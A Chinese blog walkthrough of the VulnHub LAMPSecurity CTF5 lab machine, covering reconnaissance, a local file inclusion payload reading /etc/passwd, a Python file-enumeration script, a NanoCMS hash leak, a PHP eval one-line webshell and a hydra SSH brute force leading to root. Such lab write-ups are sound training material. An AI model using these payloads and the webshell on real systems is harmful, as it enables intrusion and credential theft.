其他分享
首页 > 其他分享> > Hack the LAMPSecurity: CTF 5 (CTF Challenge)

Hack the LAMPSecurity: CTF 5 (CTF Challenge)

作者:互联网

Hack the LAMPSecurity: CTF 5 (CTF Challenge)

你好,朋友!今天,我们将面对另一个称为LAMPSecurity CTF5的CTF挑战,这是为实践提供的另一个boot2root挑战,其安全级别适用于初学者。因此,让我们尝试突破它。但请注意,您可以先从这里下载 https://www.vulnhub.com/entry/lampsecurity-ctf5,84/

下载完之后就开始我们今天的挑战啦~~

实战演练

环境说明

kali IP:192.168.35.128

主机发现

首先使用netdiscover命令查找靶机的IP。

netdiscover -i eth0 -r 192.168.35.0/24

发现靶机的主机为:192.168.35.148
在这里插入图片描述

信息收集

发现靶机IP之后,直接nmap来一波信息收集

nmap -O -sV -T4 -p 0-65535 192.168.35.148

发现靶机开启80端口和22端口,

在这里插入图片描述

先访问一下网站,然后用nikto扫描一下网站

在这里插入图片描述

nikto -host http://192.168.35.148 -port 80
---------------------------------------------------------------------------
+ Target IP:          192.168.35.148
+ Target Hostname:    192.168.35.148
+ Target Port:        80
+ Start Time:         2020-12-04 20:23:12 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.6 (Fedora)
+ Retrieved x-powered-by header: PHP/5.2.4
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to
the MIME type
+ Apache/2.2.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /index.php: PHP include error may indicate local or remote file inclusion is possible.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that
contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that
contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that
contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized
hosts.
+ Server may leak inodes via ETags, header found with file /phpmyadmin/ChangeLog, inode: 558008, size: 22676, mtime: Tue Aug 21
10:59:12 2029
+ OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Cookie SQMSESSID created without the httponly flag
+ OSVDB-3093: /mail/src/read_body.php: SquirrelMail found
+ OSVDB-3093: /squirrelmail/src/read_body.php: SquirrelMail found
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from
http://osvdb.org/
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to
authorized hosts.
+ OSVDB-3092: /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 8724 requests: 0 error(s) and 26 item(s) reported on remote host
+ End Time:           2020-12-04 20:23:57 (GMT8) (45 seconds)

尝试攻击

如我们所见,该靶机很容易受到LFI / RFI漏洞的攻击。

现在,我们将如下所示在URL中粘贴此恶意代码,使用浏览器利用LFI漏洞

http://192.168.35.148/index.php?page=../../../../etc/passwd%00

发现确实存在文件包含的漏洞,并且顺利的读出来/etc/passwd的文件。
在这里插入图片描述
这里我们查看源代码,看起来会舒服一些。

在这里插入图片描述发现存在五个用户,patrick,jennifer,andy,loren和amy
等会儿这几个用户可能会有用滴。

既然存在包含漏洞,那么直接可以写个python小脚本就可以对系统的文件进行快速枚举了哈。

import requests
  
URL = "http://192.168.35.148/index.php?page=../../../../../../NAME%00"
  
fd = open("test.txt")
  
while True:
    word = fd.readline()
    if not word:
        break
    word = word.strip()
    r = requests.get(URL.replace("NAME", word))
    if not "failed to open stream" in r.content:
        print "jiuzhe", word
fd.close()

显然,首先需要使用有趣的文件路径(例如,用户的.ssh / id_rsa)填写test.txt文件。

得到以下输出:

在这里插入图片描述不过兴趣不大:我们设法访问.bashrc,但不能访问SSH密钥。Apache日志也无法访问。

可能文件包含漏洞不能继续搞下去了,我们就得找找其他的突破口了。

在这里插入图片描述

在网站处我们发现,Andy Carp’s Blog是由NanoCMS支持,NanoCMS是基于PHP的轻量级CMS,现已停产。因此,我们在网上搜索了与Nano CMS相关的可能漏洞,并能够从以下URL https://cxsecurity.com/issue/WLB-2009040041 获取详细信息

在这里插入图片描述

识别出的可能漏洞是“密码哈希信息泄露”,它允许不受限制地访问路径/data/pagesdata.txt

尝试直接把路径附加在URL后面访问

在这里插入图片描述

竟然直接搞出来了密码,虽然密码是加密的,但是解密一波就出来了

在这里插入图片描述就这样愉快的拿到账号密码喽
账号:admin
密码:shannon

后台登陆

用上面的账号密码搁这里一登陆,
在这里插入图片描述进入到了管理员后台,在新建界面中发现可以写东西

在这里插入图片描述先写个小代码尝试

在这里插入图片描述
我们可以简单地通过/~andy/data/pages/pwned.php?cmd=ls启动命令。
在这里插入图片描述
这样就可以直接写入经典的一句话木马,

<?php
@eval($_POST['cmd']);
?>

在这里插入图片描述
蚁剑连接,拿下webshell
冲冲冲,在这里插入图片描述

这里可以看到 linux内核的版本是2.6.23.1-42,可以搜索linux内核版本的提权漏洞进行提权。不过我这里没有利用内核版本进行提权。
在这里插入图片描述

另外,同时我们可以从上面找到的5个用户,利用九头蛇暴力破解ssh
顺利破解出amy用户的密码。

hydra -L user.txt -P rockyou.txt 192.168.35.148 ssh -vV -f

在这里插入图片描述顺利登上amy这个用户
在这里插入图片描述

在这里插入图片描述

提权

找到mail的目录,发现除了自己的邮件,其他的都没有权限
在这里插入图片描述

在amy的邮件中发现这个

From apache@localhost.localdomain  Wed Apr 29 13:00:34 2009
Return-Path: <apache@localhost.localdomain>
Received: from localhost.localdomain (localhost.localdomain [127.0.0.1])
	by localhost.localdomain (8.14.1/8.14.1) with ESMTP id n3TH0Yqh007374
	for <amy@localhost.localdomain>; Wed, 29 Apr 2009 13:00:34 -0400
Received: (from apache@localhost)
	by localhost.localdomain (8.14.1/8.14.1/Submit) id n3TH0Yv7007373;
	Wed, 29 Apr 2009 13:00:34 -0400
Date: Wed, 29 Apr 2009 13:00:34 -0400
Message-Id: <200904291700.n3TH0Yv7007373@localhost.localdomain>
To: amy@localhost.localdomain
Subject: An administrator created an account for you at Phake Organization Event Manager
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 8Bit
X-Mailer: Drupal
Errors-To: patrick@localhost.localdomain
Sender: patrick@localhost.localdomain
Reply-To: patrick@localhost.localdomain
From: patrick@localhost.localdomain

amy,

A site administrator at Phake Organization Event Manager has created an account for you. You may now log in to http://192.168.229.129/events/?q=user using the following username and password:

username: amy
password: temppass

You may also log in by clicking on this link or copying and pasting it in your browser:

http://192.168.229.129/events/?q=user/reset/5/1241024434/68f9e4a85f2fad39d3140101bcc3865a

This is a one-time login, so it can be used only once.

After logging in, you will be redirected to http://192.168.229.129/events/?q=user/5/edit so you can change your password.


--  Phake Organization Event Manager team


我们通过这个邮件发现Patrick是管理员。我们将详细搜索他的个人目录。
但是第一遍 找了一圈也没找到有价值的东西

在这里插入图片描述
后来才反应过来,是否存在隐藏文件,
果不其然,

在这里插入图片描述
在隐藏文件 .tomboy中发现481bca0d-7206-45dd-a459-a72ea1131329.note 记录

481bca0d-7206-45dd-a459-a72ea1131329.note

在这里插入图片描述
惊呆了,就这,root密码就出来了
就搞完了!
在这里插入图片描述

ps:一人一个屁~~~

标签:..,OSVDB,LAMPSecurity,Challenge,192.168,CTF,localdomain,php,localhost
来源: https://blog.csdn.net/weixin_45473613/article/details/110671587